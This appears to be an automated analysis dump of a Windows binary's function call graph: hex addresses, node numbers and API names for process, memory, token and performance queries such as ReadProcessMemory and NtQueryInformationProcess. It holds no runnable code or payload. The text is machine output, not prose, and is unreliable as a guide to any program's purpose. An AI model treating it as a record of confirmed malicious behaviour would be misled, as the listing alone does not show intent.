6c87410e memset 52894->52895 52895->52891 52897 6c87aff6 52896->52897 52898 6c87afc9 GlobalMemoryStatusEx 52896->52898 52899 6c87b034 K32GetPerformanceInfo 52897->52899 52900 6c864058 52897->52900 52898->52897 52901 6c87b001 52898->52901 52899->52900 52903 6c87a960 52900->52903 52963 6c89a6b0 GetLastError 52901->52963 52904 6c87aab6 PdhOpenQueryA 52903->52904 52905 6c87a984 PdhCollectQueryData 52903->52905 52906 6c87aad4 52904->52906 52907 6c87a996 52905->52907 52912 6c87a9a8 52905->52912 52908 6c87ab30 52906->52908 52914 6c87aae5 52906->52914 52929 6c87ae04 52906->52929 53051 6c85b920 memcmp PdhGetFormattedCounterValue 52907->53051 53054 6c85b7a0 PdhRemoveCounter CloseHandle PdhCloseQuery GetLastError 52908->53054 52910 6c85bc60 101 API calls 52918 6c87a9d3 52910->52918 52912->52910 52912->52929 52913 6c87aaa7 52913->52882 52914->52913 52916 6c85ac30 3 API calls 52914->52916 52915 6c87aa2e 52915->52913 53053 6c85c720 95 API calls 52915->53053 52917 6c87ac5d 52916->52917 52923 6c85ac30 3 API calls 52917->52923 52917->52929 52918->52915 52918->52929 53052 6c85b920 memcmp PdhGetFormattedCounterValue 52918->53052 52919 6c87abd5 52919->52914 52925 6c85ac40 HeapFree 52919->52925 52920 6c87ab39 52920->52914 52920->52919 52928 6c85ac40 HeapFree 52920->52928 52926 6c87acc0 52923->52926 52924 6c87aa53 52924->52913 52931 6c85ac40 HeapFree 52924->52931 52927 6c87ac07 52925->52927 52926->52929 52964 6c87cb00 52926->52964 52927->52914 52928->52920 52933 6c85ac40 HeapFree 52929->52933 52931->52913 52934 6c87ae64 52933->52934 52936 6c9459b0 83 API calls 52934->52936 52937 6c87ae6d 52936->52937 53055 6c871120 HeapFree 52937->53055 52938 6c87adeb 52938->52905 52938->52913 52940 6c87ae78 52942 6c9459b0 83 API calls 52940->52942 52941 6c921760 91 API calls 52943 6c87ad0d 52941->52943 52945 6c87aeb6 52942->52945 52943->52938 52943->52941 52944 6c87cb00 97 API calls 52943->52944 52944->52943 52946 6c87aecb 52945->52946 52947 6c9459b0 83 API calls 52945->52947 52948 6c85ac40 HeapFree 52946->52948 52947->52946 52949 6c87aed7 52948->52949 52950 6c9459b0 83 API calls 52949->52950 52951 6c87aee0 52950->52951 52952 6c87aeff 52951->52952 52954 6c85ac40 HeapFree 52951->52954 53056 6c87e170 HeapFree 52952->53056 52954->52952 52955 6c87af08 52956 6c87af23 52955->52956 52957 6c85ac40 HeapFree 52955->52957 52958 6c87a960 111 API calls 52956->52958 52957->52956 52959 6c87af58 52958->52959 52959->52882 52960->52874 52961->52886 52962->52887 52963->52897 52965 6c87cb32 52964->52965 53068 6c87f1c0 90 API calls 52964->53068 52967 6c87cb43 52965->52967 53069 6c85fac0 6 API calls 52965->53069 53057 6c85ba90 52967->53057 52971 6c87cbb0 52972 6c87cb9c 52971->52972 52975 6c85ac40 HeapFree 52971->52975 52973 6c87acff 52972->52973 52976 6c85ac40 HeapFree 52972->52976 52978 6c85bc60 52973->52978 52974 6c87cb75 52974->52972 52977 6c85ac40 HeapFree 52974->52977 52975->52972 52976->52973 52977->52972 52979 6c85bc79 52978->52979 53047 6c85c388 52978->53047 52980 6c85bc8e GetSystemInfo 52979->52980 52981 6c85bcc5 52980->52981 53023 6c85bec6 52980->53023 52982 6c85ac30 3 API calls 52981->52982 52986 6c85bcda 52982->52986 52983 6c85ac30 3 API calls 52984 6c85beef 52983->52984 52996 6c85c0f4 52984->52996 53077 6c85c690 6 API calls 52984->53077 52989 6c85bd7f 52986->52989 52986->52996 53072 6c85f810 6 API calls 52986->53072 52987 6c85bf19 53078 6c85c690 6 API calls 52987->53078 52992 6c85ac30 3 API calls 52989->52992 52991 6c85bf28 53079 6c85c690 6 API calls 52991->53079 52994 6c85bd90 52992->52994 52994->52996 53006 6c85be4d 52994->53006 53073 6c85c690 6 API calls 52994->53073 52995 6c85c5b1 52998 6c85ac40 HeapFree 52995->52998 52996->52995 52997 6c9459b0 83 API calls 52996->52997 52997->52995 53000 6c85c5c0 52998->53000 53002 6c9459b0 83 API calls 53000->53002 53001 6c85bdd0 53074 6c85c690 6 API calls 53001->53074 53005 6c85c5c9 53002->53005 53004 6c85be91 53009 6c85beac 53004->53009 53011 6c85ac40 HeapFree 53004->53011 53012 6c85bc60 98 API calls 53005->53012 53006->52996 53006->53004 53014 6c85ac30 3 API calls 53006->53014 53024 6c85c09c 53006->53024 53007 6c85bddc 53075 6c85c690 6 API calls 53007->53075 53008 6c85bf33 53008->52996 53018 6c85ac30 3 API calls 53008->53018 53019 6c85bfaa 53008->53019 53013 6c85ac40 HeapFree 53009->53013 53009->53023 53011->53009 53020 6c85c5e0 53012->53020 53013->53023 53014->53024 53015 6c85c3af memcpy 53015->53004 53015->53009 53016 6c85bde8 53076 6c85c690 6 API calls 53016->53076 53017 6c85bfd8 memcpy 53021 6c85bffa 53017->53021 53022 6c85bfee 53017->53022 53018->53019 53019->52996 53019->53017 53020->52943 53027 6c85c027 53021->53027 53029 6c85c037 53021->53029 53026 6c85ac40 HeapFree 53022->53026 53023->52983 53024->52996 53024->53015 53026->53021 53080 6c85c720 95 API calls 53027->53080 53029->52996 53031 6c85c032 53029->53031 53081 6c85ac80 GetProcessHeap HeapAlloc HeapAlloc 53029->53081 53031->52996 53032 6c85ac30 3 API calls 53031->53032 53049 6c85c108 53031->53049 53035 6c85c0ed 53032->53035 53033 6c85bdf4 53033->53006 53037 6c85c690 6 API calls 53033->53037 53034 6c85c304 53036 6c85c336 53034->53036 53038 6c85ac40 HeapFree 53034->53038 53035->52996 53035->53049 53039 6c85c351 53036->53039 53041 6c85ac40 HeapFree 53036->53041 53037->53033 53038->53036 53042 6c85c368 53039->53042 53044 6c85ac40 HeapFree 53039->53044 53040 6c921760 91 API calls 53040->53049 53041->53039 53083 6c87e170 HeapFree 53042->53083 53043 6c9232a0 8 API calls 53043->53049 53044->53042 53046 6c85c371 53046->53047 53048 6c85ac40 HeapFree 53046->53048 53047->52943 53048->53047 53049->53034 53049->53040 53049->53043 53082 6c85f620 6 API calls 53049->53082 53051->52912 53052->52918 53053->52924 53054->52920 53055->52940 53056->52955 53058 6c85bbb2 PdhAddEnglishCounterW 53057->53058 53065 6c85baa9 53057->53065 53059 6c85bbe0 53058->53059 53067 6c85bb72 53058->53067 53070 6c9232a0 8 API calls 53059->53070 53060 6c85bbde 53060->52971 53060->52974 53062 6c85bbed 53071 6c85e100 7 API calls 53062->53071 53063 6c85ac40 HeapFree 53063->53060 53065->53058 53066 6c85bb54 memcmp 53065->53066 53066->53065 53066->53067 53067->53060 53067->53063 53068->52965 53069->52967 53070->53062 53071->53067 53072->52986 53073->53001 53074->53007 53075->53016 53076->53033 53077->52987 53078->52991 53079->53008 53080->53031 53081->53031 53082->53049 53083->53046 53084 6c86bb00 53103 6c86b1e0 53084->53103 53088 6c86bb65 53091 6c86b1e0 8 API calls 53088->53091 53089 6c86bc9d 53094 6c9459b0 83 API calls 53089->53094 53092 6c86bb89 53091->53092 53092->53089 53093 6c86bb91 53092->53093 53095 6c86bbfa 53093->53095 53096 6c86bb9a 53093->53096 53097 6c86bcf8 53094->53097 53155 6c86b300 245 API calls 53095->53155 53098 6c86bb24 53096->53098 53099 6c86bc48 53096->53099 53106 6c86ae60 53098->53106 53156 6c86b830 231 API calls 53099->53156 53102 6c86bbed 53104 6c86b1ef 53103->53104 53157 6c86f0d0 53103->53157 53104->53089 53104->53098 53128 6c89c720 53104->53128 53107 6c86aef9 53106->53107 53109 6c86aef4 53106->53109 53208 6c87f6b0 128 API calls 53107->53208 53118 6c86af68 53109->53118 53209 6c8a36b0 53109->53209 53111 6c86b04e 53112 6c86b079 53111->53112 53119 6c86b13c 53111->53119 53213 6c8a4160 105 API calls 53111->53213 53112->53102 53115 6c86b0a2 53202 6c876df0 53115->53202 53118->53111 53118->53115 53120 6c86b038 53118->53120 53169 6c87f530 53118->53169 53176 6c87f890 53118->53176 53214 6c86c730 HeapFree CloseHandle GetLastError 53119->53214 53120->53111 53189 6c89e0f0 53120->53189 53123 6c86b1b6 53124 6c9459b0 83 API calls 53123->53124 53125 6c86b1d1 53124->53125 53126 6c86f0d0 8 API calls 53125->53126 53127 6c86b1ef 53126->53127 53127->53102 53129 6c89c737 53128->53129 53132 6c89c75d 53128->53132 53603 6c8fd470 53129->53603 53131 6c89c76a 53131->53088 53132->53131 53134 6c89c777 53132->53134 53136 6c89c7ce 53132->53136 53133 6c89c7bc 53138 6c85ac40 HeapFree 53133->53138 53134->53131 53134->53133 53137 6c85ac40 HeapFree 53134->53137 53135 6c89c809 53140 6c85ac40 HeapFree 53135->53140 53136->53135 53139 6c85ac40 HeapFree 53136->53139 53137->53133 53138->53131 53139->53135 53141 6c89c816 53140->53141 53142 6c9459b0 83 API calls 53141->53142 53143 6c89c81f 53142->53143 53605 6c89b7a0 HeapFree 53143->53605 53145 6c89c827 53146 6c9459b0 83 API calls 53145->53146 53147 6c89c848 53146->53147 53148 6c89c8aa 53147->53148 53149 6c89c8b4 53147->53149 53606 6c89b640 HeapFree 53148->53606 53151 6c8fd470 3 API calls 53149->53151 53153 6c89c916 53151->53153 53152 6c89c8b2 53152->53088 53153->53152 53607 6c89b640 HeapFree 53153->53607 53155->53102 53156->53102 53158 6c86f0e0 TlsGetValue 53157->53158 53159 6c86f159 53157->53159 53161 6c86f0ec 53158->53161 53167 6c86f106 53158->53167 53160 6c86f15f TlsGetValue 53159->53160 53160->53161 53160->53167 53162 6c85ac30 3 API calls 53161->53162 53161->53167 53163 6c86f11d 53162->53163 53164 6c86f124 TlsGetValue TlsSetValue 53163->53164 53165 6c86f175 53163->53165 53166 6c86f141 53164->53166 53164->53167 53168 6c85ac40 HeapFree 53166->53168 53167->53104 53168->53167 53170 6c87f554 53169->53170 53171 6c87f59e 53169->53171 53172 6c87f5c1 53170->53172 53174 6c87f55a 53170->53174 53171->53118 53172->53171 53215 6c87f6b0 128 API calls 53172->53215 53174->53171 53216 6c87f6b0 128 API calls 53174->53216 53217 6c87fb40 53176->53217 53180 6c87f8bf 53246 6c8a5ba0 89 API calls 53180->53246 53183 6c87f8f7 53187 6c87f95e 53183->53187 53248 6c8a7380 108 API calls 53183->53248 53184 6c87f8c5 53186 6c87f8b0 53184->53186 53247 6c8a7380 108 API calls 53184->53247 53220 6c87f9c0 53186->53220 53187->53118 53190 6c89e262 53189->53190 53195 6c89e107 53189->53195 53190->53111 53194 6c8a36b0 230 API calls 53194->53190 53195->53190 53196 6c8a36b0 230 API calls 53195->53196 53198 6c89e18f 53195->53198 53199 6c8d2340 SwitchToThread 53195->53199 53308 6c89e570 53195->53308 53315 6c89eaf0 53195->53315 53328 6c89e300 53195->53328 53337 6c879b90 53195->53337 53367 6c87a470 53195->53367 53380 6c8a3400 230 API calls 53195->53380 53196->53195 53198->53194 53199->53195 53203 6c876e73 53202->53203 53204 6c9459b0 83 API calls 53203->53204 53205 6c876ead 53204->53205 53206 6c9459b0 83 API calls 53205->53206 53207 6c876f66 53206->53207 53208->53109 53210 6c8a36e6 53209->53210 53212 6c8a36bd 53209->53212 53210->53118 53212->53210 53487 6c8a36f0 53212->53487 53214->53123 53215->53171 53216->53171 53249 6c86eea0 53217->53249 53219 6c87f8ac 53219->53186 53245 6c8a6290 WaitOnAddress GetLastError WakeByAddressAll 53219->53245 53221 6c87fb40 125 API calls 53220->53221 53222 6c87f9cd 53221->53222 53223 6c87fa36 53222->53223 53224 6c87f9d1 53222->53224 53302 6c8a6290 WaitOnAddress GetLastError WakeByAddressAll 53223->53302 53225 6c87f9e5 53224->53225 53226 6c87fad4 53224->53226 53232 6c87fa2b 53225->53232 53301 6c8a68a0 104 API calls 53225->53301 53306 6c87feb0 108 API calls 53226->53306 53228 6c87fa3b 53303 6c8a5ba0 89 API calls 53228->53303 53231 6c87fa41 53231->53226 53237 6c87fa58 53231->53237 53232->53183 53234 6c87fafc 53235 6c87fb1c 53234->53235 53307 6c8a7380 108 API calls 53234->53307 53240 6c9459b0 83 API calls 53235->53240 53236 6c87fa9e 53236->53232 53305 6c8a7380 108 API calls 53236->53305 53237->53236 53304 6c8a68a0 104 API calls 53237->53304 53242 6c87fb3b 53240->53242 53243 6c86eea0 125 API calls 53242->53243 53244 6c87fb50 53243->53244 53244->53183 53245->53180 53246->53184 53247->53186 53248->53187 53250 6c86eeb4 TlsGetValue 53249->53250 53251 6c86ef65 53249->53251 53252 6c86eec4 53250->53252 53261 6c86ef53 53250->53261 53253 6c86ef6b TlsGetValue 53251->53253 53254 6c86eeea 53252->53254 53252->53261 53297 6c8a6290 WaitOnAddress GetLastError WakeByAddressAll 53252->53297 53253->53252 53253->53261 53257 6c85ac30 3 API calls 53254->53257 53256 6c86eee4 53298 6c8a5ba0 89 API calls 53256->53298 53259 6c86ef00 53257->53259 53260 6c86ef07 TlsGetValue TlsSetValue 53259->53260 53263 6c86ef81 53259->53263 53260->53261 53262 6c86ef24 53260->53262 53261->53219 53264 6c86ef46 53262->53264 53299 6c8a7380 108 API calls 53262->53299 53265 6c85ac40 HeapFree 53263->53265 53267 6c85ac40 HeapFree 53264->53267 53268 6c86ef9b 53265->53268 53267->53261 53269 6c9459b0 83 API calls 53268->53269 53270 6c86efa4 53269->53270 53271 6c86efc6 53270->53271 53300 6c8a7380 108 API calls 53270->53300 53272 6c9459b0 83 API calls 53271->53272 53274 6c86efcf 53272->53274 53275 6c86eff9 TlsGetValue 53274->53275 53276 6c86f08e 53275->53276 53277 6c86f009 53275->53277 53276->53219 53277->53276 53278 6c86f02c ProcessPrng 53277->53278 53279 6c86f046 53277->53279 53278->53279 53280 6c85ac30 3 API calls 53279->53280 53281 6c86f05b 53280->53281 53282 6c86f062 TlsGetValue TlsSetValue 53281->53282 53283 6c86f0bc 53281->53283 53282->53276 53284 6c86f084 53282->53284 53286 6c86f0e0 TlsGetValue 53283->53286 53287 6c86f159 53283->53287 53285 6c85ac40 HeapFree 53284->53285 53285->53276 53288 6c86f106 53286->53288 53290 6c86f0ec 53286->53290 53289 6c86f15f TlsGetValue 53287->53289 53288->53219 53289->53288 53289->53290 53290->53288 53291 6c85ac30 3 API calls 53290->53291 53292 6c86f11d 53291->53292 53293 6c86f124 TlsGetValue TlsSetValue 53292->53293 53294 6c86f175 53292->53294 53293->53288 53295 6c86f141 53293->53295 53296 6c85ac40 HeapFree 53295->53296 53296->53288 53297->53256 53298->53254 53299->53264 53300->53271 53301->53232 53302->53228 53303->53231 53304->53236 53305->53232 53306->53234 53307->53235 53309 6c89e594 53308->53309 53311 6c89e5de 53308->53311 53310 6c89e601 53309->53310 53313 6c89e59a 53309->53313 53310->53311 53381 6c89e6f0 120 API calls 53310->53381 53311->53195 53313->53311 53382 6c89e6f0 120 API calls 53313->53382 53383 6c89f1a0 53315->53383 53318 6c89eb10 53386 6c89f020 53318->53386 53320 6c89eb1f 53412 6c8a5ba0 89 API calls 53320->53412 53323 6c89eb25 53323->53318 53413 6c8a7380 108 API calls 53323->53413 53325 6c89ebbe 53325->53195 53326 6c89eb57 53326->53325 53414 6c8a7380 108 API calls 53326->53414 53329 6c89e570 120 API calls 53328->53329 53331 6c89e317 53329->53331 53330 6c89eaf0 117 API calls 53330->53331 53331->53330 53332 6c89e342 53331->53332 53335 6c89e452 53331->53335 53332->53335 53336 6c89e431 53332->53336 53452 6c8a2c00 117 API calls 53332->53452 53335->53195 53336->53335 53453 6c89ee00 HeapFree SwitchToThread 53336->53453 53338 6c879cb8 53337->53338 53339 6c879bc0 53337->53339 53341 6c879cda 53338->53341 53345 6c85ac40 HeapFree 53338->53345 53340 6c879c0d 53339->53340 53343 6c879c04 53339->53343 53344 6c879c12 53339->53344 53340->53338 53342 6c879c64 53340->53342 53457 6c8a4170 153 API calls 53341->53457 53346 6c879cad 53342->53346 53348 6c879c77 53342->53348 53455 6c89dc90 230 API calls 53342->53455 53454 6c880380 HeapFree CloseHandle GetLastError 53343->53454 53344->53340 53351 6c85ac40 HeapFree 53344->53351 53345->53341 53346->53195 53348->53346 53456 6c85f270 HeapFree 53348->53456 53351->53340 53368 6c87a49b 53367->53368 53372 6c87a5bf 53367->53372 53458 6c878670 53368->53458 53371 6c87a504 53461 6c8782f0 53371->53461 53483 6c8eada0 102 API calls 53372->53483 53375 6c87a559 53481 6c878920 HeapFree CloseHandle GetLastError 53375->53481 53377 6c87a58d 53482 6c878db0 16 API calls 53377->53482 53379 6c87a5b7 53379->53195 53380->53195 53381->53311 53382->53311 53415 6c8a0750 53383->53415 53387 6c89f1a0 117 API calls 53386->53387 53388 6c89f02d 53387->53388 53389 6c89f031 53388->53389 53390 6c89f096 53388->53390 53392 6c89f045 53389->53392 53399 6c89f134 53389->53399 53446 6c8a6290 WaitOnAddress GetLastError WakeByAddressAll 53390->53446 53397 6c89f08b 53392->53397 53445 6c8a68a0 104 API calls 53392->53445 53393 6c89f09b 53447 6c8a5ba0 89 API calls 53393->53447 53396 6c89f0a1 53398 6c89f0b8 53396->53398 53396->53399 53397->53326 53406 6c89f0fe 53398->53406 53448 6c8a68a0 104 API calls 53398->53448 53450 6c89f200 108 API calls 53399->53450 53401 6c89f15c 53407 6c89f17c 53401->53407 53451 6c8a7380 108 API calls 53401->53451 53405 6c9459b0 83 API calls 53408 6c89f19b 53405->53408 53406->53397 53449 6c8a7380 108 API calls 53406->53449 53407->53405 53409 6c8a0750 117 API calls 53408->53409 53410 6c89f1b0 53409->53410 53410->53326 53411 6c8a6290 WaitOnAddress GetLastError WakeByAddressAll 53411->53320 53412->53323 53413->53318 53414->53325 53416 6c8a0764 TlsGetValue 53415->53416 53417 6c8a0815 53415->53417 53418 6c8a0774 53416->53418 53428 6c89eb0c 53416->53428 53419 6c8a081b TlsGetValue 53417->53419 53425 6c8a079a 53418->53425 53418->53428 53441 6c8a6290 WaitOnAddress GetLastError WakeByAddressAll 53418->53441 53419->53418 53419->53428 53421 6c8a0794 53442 6c8a5ba0 89 API calls 53421->53442 53422 6c85ac30 3 API calls 53424 6c8a07b0 53422->53424 53426 6c8a0831 53424->53426 53427 6c8a07b7 TlsGetValue TlsSetValue 53424->53427 53425->53422 53432 6c85ac40 HeapFree 53426->53432 53427->53428 53429 6c8a07d4 53427->53429 53428->53318 53428->53411 53430 6c8a07f6 53429->53430 53443 6c8a7380 108 API calls 53429->53443 53431 6c85ac40 HeapFree 53430->53431 53431->53428 53434 6c8a084b 53432->53434 53435 6c9459b0 83 API calls 53434->53435 53436 6c8a0854 53435->53436 53437 6c8a0876 53436->53437 53444 6c8a7380 108 API calls 53436->53444 53439 6c9459b0 83 API calls 53437->53439 53440 6c8a087f 53439->53440 53441->53421 53442->53425 53443->53430 53444->53437 53445->53397 53446->53393 53447->53396 53448->53406 53449->53397 53450->53401 53451->53407 53452->53332 53453->53336 53454->53340 53455->53348 53456->53346 53459 6c86f0d0 8 API calls 53458->53459 53460 6c878680 53459->53460 53460->53371 53460->53372 53462 6c878389 53461->53462 53464 6c878384 53461->53464 53484 6c87f6b0 128 API calls 53462->53484 53465 6c8a36b0 230 API calls 53464->53465 53473 6c8783f8 53464->53473 53465->53473 53466 6c8784de 53468 6c878509 53466->53468 53474 6c8785cc 53466->53474 53485 6c8a4160 105 API calls 53466->53485 53467 6c87f530 128 API calls 53467->53473 53468->53375 53470 6c878532 53471 6c876df0 83 API calls 53470->53471 53471->53468 53472 6c87f890 125 API calls 53472->53473 53473->53466 53473->53467 53473->53470 53473->53472 53475 6c8784c8 53473->53475 53486 6c878be0 HeapFree CloseHandle GetLastError 53474->53486 53475->53466 53477 6c89e0f0 230 API calls 53475->53477 53477->53466 53478 6c878646 53479 6c9459b0 83 API calls 53478->53479 53480 6c878661 53479->53480 53481->53377 53482->53379 53483->53375 53484->53464 53486->53478 53488 6c8a37ea 53487->53488 53489 6c8a3704 53487->53489 53506 6c8a3030 53488->53506 53490 6c8a371f 53489->53490 53533 6c8fd2a0 WaitOnAddress GetLastError 53489->53533 53492 6c8a3730 53490->53492 53534 6c8ead60 12 API calls 53490->53534 53495 6c8a374f 53492->53495 53498 6c8a376c 53492->53498 53532 6c8e6a10 WakeByAddressSingle 53492->53532 53495->53498 53536 6c8ead60 12 API calls 53495->53536 53496 6c8a3804 53500 6c9459b0 83 API calls 53496->53500 53499 6c8a3777 53498->53499 53535 6c8fd340 WakeByAddressSingle 53498->53535 53499->53212 53503 6c8a381c 53500->53503 53513 6c89c210 53503->53513 53505 6c8a3883 53505->53212 53507 6c8a3039 53506->53507 53512 6c8a3047 53506->53512 53507->53512 53538 6c8ead60 12 API calls 53507->53538 53508 6c8a304f 53508->53496 53511 6c8a3058 53511->53496 53512->53508 53537 6c8fd340 WakeByAddressSingle 53512->53537 53539 6c89dcb0 53513->53539 53515 6c89c22c 53562 6c89e520 53515->53562 53519 6c89c335 53578 6c89b8a0 91 API calls 53519->53578 53521 6c89c4b3 53522 6c9459b0 83 API calls 53521->53522 53531 6c89c4b9 53522->53531 53524 6c89c2e3 53524->53519 53526 6c89c2f4 53524->53526 53525 6c89e0f0 230 API calls 53525->53524 53527 6c89c110 16 API calls 53526->53527 53528 6c89c303 53527->53528 53577 6c89b8a0 91 API calls 53528->53577 53530 6c89c32d 53530->53505 53531->53505 53532->53495 53533->53490 53534->53492 53535->53499 53536->53498 53537->53511 53538->53512 53540 6c85ac30 3 API calls 53539->53540 53541 6c89dcf7 53540->53541 53542 6c89dd02 memset 53541->53542 53543 6c89df85 53541->53543 53544 6c89dd20 53542->53544 53545 6c89dfa9 53543->53545 53579 6c8a1af0 HeapFree 53543->53579 53550 6c85ac40 HeapFree 53544->53550 53551 6c89df78 53544->53551 53547 6c89dfbd 53545->53547 53580 6c8a1af0 HeapFree 53545->53580 53549 6c89dfd6 53547->53549 53554 6c85ac40 HeapFree 53547->53554 53552 6c89dfea 53549->53552 53581 6c8a1770 HeapFree 53549->53581 53550->53551 53551->53515 53553 6c9459b0 83 API calls 53552->53553 53556 6c89dff3 53553->53556 53554->53549 53557 6c89e520 8 API calls 53556->53557 53559 6c89e00b 53557->53559 53558 6c89e016 53558->53515 53559->53558 53560 6c89e520 8 API calls 53559->53560 53561 6c89e05b 53560->53561 53561->53515 53582 6c8a0890 53562->53582 53564 6c89c236 53564->53519 53565 6c89c110 53564->53565 53566 6c89c129 53565->53566 53567 6c89c170 53565->53567 53569 6c89c137 53566->53569 53600 6c8ead60 12 API calls 53566->53600 53599 6c8fd2a0 WaitOnAddress GetLastError 53567->53599 53576 6c89c160 53569->53576 53598 6c8e6a30 WakeByAddressAll 53569->53598 53572 6c89c14b 53572->53576 53602 6c8ead60 12 API calls 53572->53602 53573 6c89c168 53573->53519 53573->53524 53573->53525 53576->53573 53601 6c8fd340 WakeByAddressSingle 53576->53601 53577->53530 53578->53521 53579->53545 53580->53547 53581->53552 53583 6c8a0919 53582->53583 53584 6c8a08a0 TlsGetValue 53582->53584 53586 6c8a091f TlsGetValue 53583->53586 53585 6c8a08c6 53584->53585 53587 6c8a08ac 53584->53587 53585->53564 53586->53585 53586->53587 53587->53585 53588 6c85ac30 3 API calls 53587->53588 53589 6c8a08dd 53588->53589 53590 6c8a08e4 TlsGetValue TlsSetValue 53589->53590 53591 6c8a0935 53589->53591 53590->53585 53592 6c8a0901 53590->53592 53594 6c8a09c6 53591->53594 53597 6c85ac40 HeapFree 53591->53597 53593 6c85ac40 HeapFree 53592->53593 53593->53585 53595 6c85ac40 HeapFree 53594->53595 53596 6c8a09dd 53594->53596 53595->53596 53596->53564 53597->53591 53598->53572 53599->53566 53600->53569 53601->53573 53602->53576 53608 6c8fd485 53603->53608 53605->53145 53606->53152 53607->53152 53609 6c8fd48a 53608->53609 53612 6c8fd4ff 53608->53612 53610 6c8fd5c1 53609->53610 53611 6c8fd4d6 WaitOnAddress 53609->53611 53609->53612 53611->53609 53613 6c8fd4e6 GetLastError 53611->53613 53612->53610 53614 6c8fd5ba WakeByAddressAll 53612->53614 53613->53609 53614->53610 53615 6c874c20 53616 6c874c3e 53615->53616 53627 6c874d2c 53615->53627 53617 6c874cb4 GetProcessTimes 53616->53617 53618 6c874d02 GetSystemTimes 53616->53618 53617->53618 53619 6c874cd0 53617->53619 53621 6c874d27 53618->53621 53618->53627 53759 6c89a6b0 GetLastError 53619->53759 53620 6c874fd0 GetProcessIoCounters 53623 6c87501b 53620->53623 53628 6c874fe4 53620->53628 53760 6c89a6b0 GetLastError 53621->53760 53761 6c89a6b0 GetLastError 53623->53761 53625 6c874cd5 53625->53618 53627->53620 53627->53628 53629 6c875176 53628->53629 53632 6c8750a7 OpenProcessToken 53628->53632 53630 6c875b5d 53629->53630 53631 6c87532b NtQueryInformationProcess 53629->53631 53640 6c875b98 memset 53630->53640 53672 6c875be0 53630->53672 53631->53630 53633 6c875357 NtQueryInformationProcess 53631->53633 53634 6c875171 53632->53634 53635 6c8750c0 53632->53635 53633->53630 53638 6c87538a 53633->53638 53764 6c89a6b0 GetLastError 53634->53764 53635->53629 53639 6c8750d0 GetTokenInformation 53635->53639 53638->53630 53641 6c8753b2 53638->53641 53642 6c8751e4 53639->53642 53643 6c8750fe GetProcessHeap 53639->53643 53758 6c8898f0 53640->53758 53645 6c875494 ReadProcessMemory 53641->53645 53646 6c8753ba ReadProcessMemory 53641->53646 53766 6c89a6b0 GetLastError 53642->53766 53647 6c875116 HeapAlloc 53643->53647 53648 6c8751ac 53643->53648 53655 6c8754b6 ReadProcessMemory 53645->53655 53651 6c8753db ReadProcessMemory 53646->53651 53653 6c875127 GetTokenInformation 53647->53653 53654 6c875258 CloseHandle 53647->53654 53765 6c89a6b0 GetLastError 53648->53765 53649 6c875bbb GetModuleFileNameExW 53649->53672 53657 6c875402 memcpy 53651->53657 53659 6c875142 53653->53659 53660 6c87522a 53653->53660 53654->53629 53662 6c8755fd 53654->53662 53661 6c8754da 53655->53661 53656 6c8751e9 53656->53643 53658 6c8751b1 53656->53658 53683 6c875435 53657->53683 53658->53654 53664 6c8751d2 53658->53664 53762 6c8626d0 92 API calls 53659->53762 53767 6c89a6b0 GetLastError 53660->53767 53687 6c875581 VirtualQueryEx 53661->53687 53691 6c876890 NtQueryInformationProcess 53661->53691 53662->53634 53664->53654 53666 6c87522f 53669 6c875241 53666->53669 53667 6c875151 53670 6c875165 53667->53670 53671 6c875604 53667->53671 53768 6c874370 GetProcessHeap HeapFree GetLastError 53669->53768 53763 6c874370 GetProcessHeap HeapFree GetLastError 53670->53763 53676 6c875638 53671->53676 53681 6c85ac40 HeapFree 53671->53681 53673 6c8757b8 53729 6c8765b0 53673->53729 53770 6c874370 GetProcessHeap HeapFree GetLastError 53676->53770 53680 6c87516c 53684 6c861300 2 API calls 53680->53684 53681->53676 53682 6c87555e 53769 6c87e530 HeapFree 53682->53769 53683->53645 53684->53629 53686 6c875564 53686->53687 53689 6c85ac40 HeapFree 53686->53689 53687->53673 53688 6c8757d5 53690 6c85ac40 HeapFree 53688->53690 53689->53687 53690->53688 53692 6c8768b1 53691->53692 53693 6c8768bc 53691->53693 53777 6c89a890 GetErrorInfo 53692->53777 53694 6c8769a6 53693->53694 53696 6c85ac30 3 API calls 53693->53696 53708 6c876965 53693->53708 53698 6c85ac40 HeapFree 53694->53698 53697 6c87692c 53696->53697 53697->53694 53699 6c876933 NtQueryInformationProcess 53697->53699 53700 6c8769c2 53698->53700 53701 6c87696a 53699->53701 53702 6c876949 53699->53702 53703 6c9459b0 83 API calls 53700->53703 53704 6c85ac40 HeapFree 53701->53704 53771 6c876440 CommandLineToArgvW 53702->53771 53710 6c8769cb 53703->53710 53704->53708 53707 6c85ac40 HeapFree 53707->53708 53708->53682 53709 6c876a01 53712 6c876a92 53709->53712 53713 6c876a0e 53709->53713 53710->53709 53723 6c876a60 53710->53723 53778 6c86f3b0 WaitOnAddress GetLastError WakeByAddressAll 53710->53778 53715 6c8765b0 91 API calls 53712->53715 53714 6c876890 101 API calls 53713->53714 53721 6c876a16 53714->53721 53716 6c876aa4 53715->53716 53718 6c876440 9 API calls 53716->53718 53724 6c876ab0 53716->53724 53717 6c876a4c 53719 6c85ac40 HeapFree 53717->53719 53717->53723 53722 6c876ad4 53718->53722 53719->53723 53720 6c876b1c 53720->53723 53726 6c85ac40 HeapFree 53720->53726 53721->53717 53725 6c85ac40 HeapFree 53721->53725 53722->53724 53727 6c85ac40 HeapFree 53722->53727 53723->53682 53724->53720 53728 6c85ac40 HeapFree 53724->53728 53725->53721 53726->53723 53727->53724 53728->53724 53730 6c8765cd 53729->53730 53731 6c876694 53729->53731 53730->53731 53732 6c85ac30 3 API calls 53730->53732 53734 6c85ac40 HeapFree 53731->53734 53733 6c8765ec 53732->53733 53733->53731 53735 6c8765f7 ReadProcessMemory 53733->53735 53736 6c8766b0 53734->53736 53738 6c876635 53735->53738 53741 6c87661a 53735->53741 53737 6c9459b0 83 API calls 53736->53737 53743 6c8766b9 53737->53743 53781 6c89a6b0 GetLastError 53738->53781 53739 6c876622 53739->53688 53741->53739 53742 6c85ac40 HeapFree 53741->53742 53742->53739 53744 6c8765b0 90 API calls 53743->53744 53748 6c876709 53743->53748 53745 6c876739 53744->53745 53746 6c876746 53745->53746 53749 6c876769 53745->53749 53747 6c85ac40 HeapFree 53746->53747 53746->53748 53747->53748 53748->53688 53782 6c876350 6 API calls 53749->53782 53751 6c8767d0 53752 6c87681d 53751->53752 53753 6c8767d9 53751->53753 53754 6c85ac40 HeapFree 53752->53754 53757 6c876805 53752->53757 53755 6c85ac40 HeapFree 53753->53755 53753->53757 53754->53757 53755->53757 53756 6c85ac40 HeapFree 53756->53748 53757->53748 53757->53756 53758->53649 53759->53625 53760->53627 53761->53628 53762->53667 53763->53680 